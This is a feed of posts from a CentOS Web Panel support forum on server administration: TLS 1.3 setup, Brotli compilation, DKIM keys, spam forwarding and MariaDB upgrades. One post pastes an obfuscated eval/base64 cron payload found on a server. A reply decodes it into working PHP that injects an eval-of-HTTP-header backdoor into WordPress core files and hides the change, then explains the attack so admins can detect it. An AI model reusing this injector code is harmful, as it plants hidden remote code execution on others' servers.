All Activity

Will this guide work on a AL8 elevated CWP server?

some meial functions are not working only

@Sandeep B. I am going to be doing a server migration. and doing a fresh CWP install on the existing one and before I build and rebuild a server... Is CWP Pro ready for Almalinux 9? CWP HQ says "AlmaLinux 9 has some missing features" What missing features? Is there a list / link to specs? development updates? I am running php 8.2 & 8.3 for WorPress and Nextcloud nginx/apache/Varnish/modsec/ Anyways thanks for the feed back.

As of now I am able resolve the issue by Solution: Step 1: Made sure that SPAMAssassin is working. https://forum.centos-webpanel.com/e-mail/how-to-install-spamassassin-updated/msg51428/#msg51428 and other threads Step 2: Added outgoing email filter to block emails with subject SPAM https://talk.plesk.com/threads/do-not-forward-spam-emails-to-external-mailbox.370124/ This is working very well now.

Hello I solved the problem on my server. The following is what I could get out of this experience. In the case one has a recent linux version, just as in my case in which I had Almalinux 9.5, then updated to 9.6 (Sage Margay), and a CWP pro recent version, mine now is 0.9.8.1204, there is no need to compile Nginx and other components. Just in case before starting check if your Nginx, openssl, apache are compiled to support http2, maybe http3, and TLSv1.3, if they are you are good to proceed. Next step is to create proper templates for the webservers (nginx in particular if you use it as reverse proxy) as described by Sandeep (thank you Sandeep for the help, very appreciated in the years!) While you do this you also might want to add security directives and options, that depends on your needs Then rebuild your host and vhost configurations, check that all nginx conf files so generated are correct and reflecting your choices (if they do not you have some mistake in your templates, adjust and check, eventually later on fix your templates too). In latest nginx builds the use of the directive (here with variables as seen in the nginx conf templates in CWP) listen %ip%:%nginx_port% ssl %http2%; is deprecated use the following instead listen %ip%:%nginx_port% ssl; %http2% on; In your generated conf files will look like this: listen 123.123.1231233:443 ssl; http2 on; Check in your nginx conf files of the host and vhosts that all lines telling ssl_protocols do have both TLSv1.2 and TLSv1.3 stated, as follows: ssl_protocols TLSv1.2 TLSv1.3; When done in a terminal check nginx configuration running nginx -t If OK without errors restart nginx service (either form cwp or terminal) I am not sure that changing host name as suggested in previous post from TheHolbi is always necessary, however if checking your website for TLSv1.3 (e.g. against qualys website, or in your terminal) you get errors, try "change hostname" in CWP, in reality you do not really need to actually change the name of your host, you just need to click the button so to have all rebuilt and a new certificate generated, if you want to improve your host security you can chose the 4096 bit key, this will increase computation and some traffic, but this is not truly going to affect all of your server (as far as I understood... I should dig more on that). In conclusion if you have CWP Pro (maybe also the fre one, I do not know as I did not try it) on Alamlinux 9.6 everything is already good to go, you just need to tell the server to use TLSv1.3 That's all folks. Thank you again for all the help published here and other websites, special thanks to Sandeep again. Bye.

Email messages are essentially text messages. When you install postfix-pcre, it will perform a regex analysis on each message, and this involves additional processing. If you have a small volume of messages on your mail server, this is fine, there should be no problem. But if your traffic is heavier, I recommend that you do a performance analysis, and if there is an impact, find a less expensive solution.

I see some hints at https://talk.plesk.com/threads/do-not-forward-spam-emails-to-external-mailbox.370124/ Using postfix-pcre to block outgoing emails with SPAM in subject line Have implemented the same. Hope it works, I will update it here.

Not Working on CWP 9.5 AlmaLinux as of today due to version mismatch of module and nginx server I am currently on nginx-1.28.0 Here’s a complete step-by-step I followed to get Brotli compression working in my CWP (AlmaLinux 9.5) Nginx stack. Hope it will help some body This Tutorial is future version ready!!! 1. Install Build Dependenciessudo dnf install -y epel-release sudo dnf groupinstall "Development Tools" -y sudo dnf install -y \ gcc make pcre2-devel zlib-devel openssl-devel git \ brotli brotli-develbrotli/brotli-devel gives you the CLI compressor (optional but useful). The rest are needed to compile the Nginx module. 2. Clone the ngx_brotli Modulecd /usr/local/src sudo git clone https://github.com/google/ngx_brotli.git cd ngx_brotli sudo git submodule update --init 3. Download Matching Nginx Source# Find your installed Nginx version NGINX_VER=$(nginx -v 2>&1 | awk -F/ '{print $2}') cd /usr/local/src sudo curl -LO http://nginx.org/download/nginx-$NGINX_VER.tar.gz sudo tar zxvf nginx-$NGINX_VER.tar.gz 4. Compile Only the Dynamic Brotli Modulecd nginx-$NGINX_VER sudo ./configure \ --with-compat \ --add-dynamic-module=../ngx_brotli sudo make modulesThis produces two files in objs/: ngx_http_brotli_filter_module.so ngx_http_brotli_static_module.so 5. Install the Compiled Modulessudo mkdir -p /etc/nginx/modules sudo cp objs/ngx_http_brotli_filter_module.so \ objs/ngx_http_brotli_static_module.so \ /etc/nginx/modules/ 6. Enable the Modules in NginxEdit your main /etc/nginx/nginx.conf at the very top, before any events/http/stream blocks: load_module modules/ngx_http_brotli_filter_module.so; load_module modules/ngx_http_brotli_static_module.so;Be sure these lines come before the first worker_processes or events block. 7. Configure Brotli in Your HTTP ContextInside the http { ... } section of /etc/nginx/nginx.conf, add or adjust: # Compression brotli brotli on; brotli_comp_level 6; brotli_static on; brotli_types text/xml image/svg+xml application/x-font-ttf image/vnd.microsoft.icon application/x-font-opentype application/json font/eot application/vnd.ms-fontobject application/javascript font/otf application/xml application/xhtml+xml text/javascript application/x-javascript text/plain application/x-font-truetype application/xml+rss image/x-icon font/opentype text/css image/x-win-bitmap;You can tune brotli_comp_level (1–11) and the MIME types as needed. 8. Test and Reloadsudo nginx -t sudo systemctl reload nginx9. VerifyCLI: brotli --version HTTP: Use curl to check the Content-Encoding header: curl -H "Accept-Encoding: br" -I https://your.domain/ You should see: Content-Encoding: brThat’s it - your CWP Nginx now serves Brotli-compressed responses

A simple restart on your php-fpm server, while serving pages, can cause these messages. A restart on your php-fpm server can occur if you run a cron process restarting the server at that time, or, for example, if you set a rebuild in the CWP configuration that did not complete. Check the cron logs (/var/log/cron) at that time to see if there is a process restarting your php-fpm around that time. Regards, Netino

It is not feasible to disable these redirects. So, you can do what I do: use a global antispam system on your server, where you can use postscreen, and use a system (Spamassassin, Rspamd, etc) that performs Bayesian analysis of emails (there will be complaints, globally means spam for some, but not for others). But Bayesian analysis learns fast, before problem turn big. Rspamd have neural analisys, too. In addition, monitor rejections from major providers: Gmail, Outlook (mainly Hotmail), etc. When there are problems with these major email providers, they complain first with error messages, and gradually lowering reputation of your mail server. With active monitoring, you will have enough time to avoid a definitive block on them, and you will have time to complain about the redirection of your clients, or even disable them. Regards, Netino

[Wed May 21 00:34:42.824943 2025] [proxy_fcgi:error] [pid 296120:tid 296160] (70007)The timeout specified has expired: [client xxx:43672] AH01075: Error dispatching request to : (polling) Connection refused: AH02454: FCGI: attempt to connect to Unix domain socket /opt/alt/php-fpm82/usr/var/sockets/domain.sock (localhost:8000) failed AH01079: failed to make connection to backend: localhost I Get this error EVERY night at around 00-02 the only way to get the page up again is by restarting the php-fpm service. All other sites on the server are online only 1 page goes down. i cant figure out what causes this. Any ideas?

My users have setup many email forwards The SPAM emails also get forwarded Due to this, email providers like microsoft / gmail are rate limiting emails from my servers and also blacklisting the IP How to stop my server forwarding SPAM I have enabled ClamAV, Amavis & Spamassassin

And all of the hacker's they have and allow on their network...

Imunify AV is not fully compatible with CWP yet, You can ask immunity to check the compatibility

@Sandeep B. Is there a guide for installing Imunify AV on CWP. Could you have a go at it and try to make a guide for standalone installation, OR even better making a in panel integration?

Have you tried adding a custom img centos7 iso to your account on contabo VPS control?

On a rather wery old CentOS 7 installation, I have a user called "admin". However, this username is no longer allowed, and when I try to use it, I get the message "username is a reserved word". I've been thinking about reinstalling the server for a while, but I'm not sure if I'll be able to restore the backup for that user due to the username. Since I can't change the username on the active server, is there any way to resolve this issue?

Hello I do have cwp pro updated to latest version as of april 2025, updated almalinux 9.5 , Apache/2.4.62 + nginx 1.28.0, php-fpm, also I forced use of https http2 I have tried to add use of tls 1.3 following this of the last post in this thread: "The solution of TLSv1.3 in AlmaLinux 9.5 with CWP Pro was reinstall hostname certificates (for all services) in the Change Hostname menu with 4096 size key. After then all issue was resolved, and the TLSv1.3 check was pass in both way, from terminal and from browser also. Of course in all templates and Nginx config files was changed the setting to ssl_protocols TLSv1.2 TLSv1.3;" I did not notice errors, but does not work. Am I missing something? Thank you in advance for any help.

This is an obfuscated code in base64. Decoding this base64 sequence, it generate the following php code, that will be executed by php itself through "eval" php function: phpConfValidate('YTo0OntpOjA7czo1MDoiL2hvbWUvZm90YmFsbG5lcmQvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvbWV0YS5waHAiO2k6MTtzOjk4OiJ+ZXZhbFteXChcblxyXSpcKFteXCRdKlwkX1tBLVpdezZ9W15cW10qXFtbXlwnXCJdKltcJ1wiXUhUVFBfRDM0MUJFRFtcJ1wiXVteXF1dKlxdW15cKV0qXClbXjtdKjt+cyI7aToyO3M6MzI6IkBldmFsKCRfU0VSVkVSWydIVFRQX0QzNDFCRUQnXSk7IjtpOjM7czozMzoifl5ccypmdW5jdGlvblxzK3VwZGF0ZV9tZXRhZGF0YX5tIjt9'); function phpConfValidate($ser) { list ($fullPath, $systemEnv, $code, $pattern) = unserialize(base64_decode($ser)); $source = file_get_contents($fullPath); if (preg_match($systemEnv, $source)) { return; } if (!preg_match($pattern, $source, $matches)) { return; } $incorrectRegex = str_replace('e' . 'va' . 'l', '@?arr' . 'ay', $systemEnv); $newSource = preg_replace($incorrectRegex, '', $source); $newSource = str_replace($matches[0], $code . PHP_EOL . $matches[0], $newSource); if (!preg_match($systemEnv, $newSource)) { return; } $filemtime = filemtime($fullPath) + 10; unlink($fullPath); file_put_contents($fullPath, $newSource); touch($fullPath, $filemtime); } Decoding the following sequence: phpConfValidate('YTo0OntpOjA7czo1MDoiL2hvbWUvZm90YmFsbG5lcmQvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvbWV0YS5waHAiO2k6MTtzOjk4OiJ+ZXZhbFteXChcblxyXSpcKFteXCRdKlwkX1tBLVpdezZ9W15cW10qXFtbXlwnXCJdKltcJ1wiXUhUVFBfRDM0MUJFRFtcJ1wiXVteXF1dKlxdW15cKV0qXClbXjtdKjt+cyI7aToyO3M6MzI6IkBldmFsKCRfU0VSVkVSWydIVFRQX0QzNDFCRUQnXSk7IjtpOjM7czozMzoifl5ccypmdW5jdGlvblxzK3VwZGF0ZV9tZXRhZGF0YX5tIjt9'); ...we will get the a code, that will saved and be executed in your server: a:4:{i:0;s:50:"/home/fotballnerd/public_html/wp-includes/meta.php";i:1;s:98:"~eval[^\(\n\r]*\([^\$]*\$_[A-Z]{6}[^\[]*\[[^\'\"]*[\'\"]HTTP_D341BED[\'\"][^\]]*\][^\)]*\)[^;]*;~s";i:2;s:32:"@eval($_SERVER['HTTP_D341BED']);";i:3;s:33:"~^\s*function\s+update_metadata~m";} Its a sequence of obsfuscated sequences of codes. This last line make sense to you? If no, is strongly possible your user is trying to crack your server. Check a discussion on this site: https://www.operationdecode.com/http-header-injection-and-modsecurity-evasion/ The result on your server is very similar to what is shown on this site, like they said: "Further analysis also indicated that this method could be used to connect to a C2 and act as a zombie host. Throughout our investigation, and in reviewing a large number of these cron and files; we can see this is a direct attack on WordPress, where the code is being injected into default WordPress files that are required for the WordPress page to load. What this allows for, is the malicious actor to send the request directly to the domain name, and not to the affected files to get the desired outcome. Furthermore, when reviewing the access logs, there is no evidence of an attack. What is visible in the logs are only the GET requests to the root of the website. This was tested on a local installation of an infected site. (...) As this method for persistence and connecting to a c2 is very stealthy, it is not easily detected and may be overlooked. A search via the command line for "@eval(http_" should help in finding if this infection exists in your WordPress installation." Regards, Netino

You can use the following command: opendkim-genkey -b 1024 -d yourdomain.com -D /etc/opendkim/keys/yourdomain.com -s yourselector -vIf that doesn't work, you'll need to resort to a longer checklist, which you can check here: <https://easydmarc.com/blog/how-to-configure-dkim-opendkim-with-postfix/> Regards, Netino

@Sandeep B. Please help

Hi everyone, I am running CWP on Almalinux8 and recently ran into an email‐delivery problem. When I checked /etc/opendkim/userkeys/mydomain.com, I discovered that both default.txt (DNS record) and default.private (signing key) are missing. What I have tried so far: Used the DKIM Manager in CWP to regenerate keys. Rebuilt/restarted the mailserver via CWP’s control panel. Unfortunately, the key files never appear and the DKIM signature remains invalid. Can anyone share the exact steps or commands to regenerate the DKIM key pair (default.txt / default.private) for a domain under CWP?

Some users are creating cron jobs under their usename. How can i make shure that this stops? looks like this: /usr/bin/php -r 'eval(gzinflate(base64_decode("jVJrb5swFP2eX8GkSCRqNUHbpIqmaWvTkidLQxriME0RGFMMxjAwUJj632fIsw9p8wd8jc85995z3YjcqB9SRzcJtk2GWuL6MZRmlEUz7+YalqGs3oV4euFm1mqZGUFPWgdKYg06BAbzDA51bA2IBy5cyVrlmX15w8xVx7OGum8AlXN0ab3o5ObwBs8u/K76yMqZ51/N8PjMAIZrKQyBvgst8lyARQQn9VmzJyT3gcxup3pko9LoreQOXMnSb6AwC5Ccgv6YYxgcyzkGS3epK7eOdqdK6nKsaMruv861FJnjnu2KP9E5v08s4DF74rEzWIyuzcewmF2qXbUcdUf+LbF5b5O+5iwlfaH7+mJV2CNd0eZAmpc/7pS+tpxTsPCvR17lj1r5U6pliB3SgbCIApv3bg9IxvspJ5d6bgwUydB7zACaW8Vr0GGc2xPbXxpOSiHDIRXeTqCZoLgt/Gk0BL4ITpjQajopIQ8mc8+FZlIkDAX3NOMxDG3Et8hkDMW0LXwVUsrZmEuVqGWZCepebWxUwbayPG+l2kzCNIaI4x1M0OYJsQ0MKUOUJcdcOyx2hFYUo6dNYDLotl7l38q0q2qF3YoRS2O6pb4cBD6dKuzKPfB5UN+g5B9K29oxhWEcI8g09ISeeQ8JizcxiogJ+fNFovBZEDOz3oh4Lojfv5lxXB/NQjw1cG8GRfli70dd517sTSquJR6b/oB8Wsi+pZ/Sr92geAUPw4fN/WzKo9fXB5Gd6vHzzrxT+4+0//GtGnXAcLAfex2fjFs4E2RpS0spwdR/9xTqxxKlHz2WD5pgYVoVfII4ZOWIl8Zf")));'

Recreate the user and try the upgrade again: CREATE USER `mariadb.sys`@`localhost` ACCOUNT LOCK PASSWORD EXPIRE; GRANT SELECT, DELETE ON `mysql`.`global_priv` TO `mariadb.sys`@`localhost`;

Hi Sandeep, The upgrade went with a few hiccups but i managed to it working. when i do mysql -V it shows me mysql Ver 15.1 Distrib 10.11.11-MariaDB, for Linux (x86_64) using readline 5.1 but after i did the command mysql_upgrade --force and i scrolled up it gave me this : mysql.transaction_registry OK mysql.user OK Phase 2/8: Installing used storage engines... Skipped Phase 3/8: Running 'mysql_fix_privilege_tables' Phase 4/8: Fixing views mysql.user Warning : The user specified as a definer ('mariadb.sys'@'localhost') does not exist status : OK sys.host_summary OK the rest says all ok... behind. is this an issue or ? regards Mike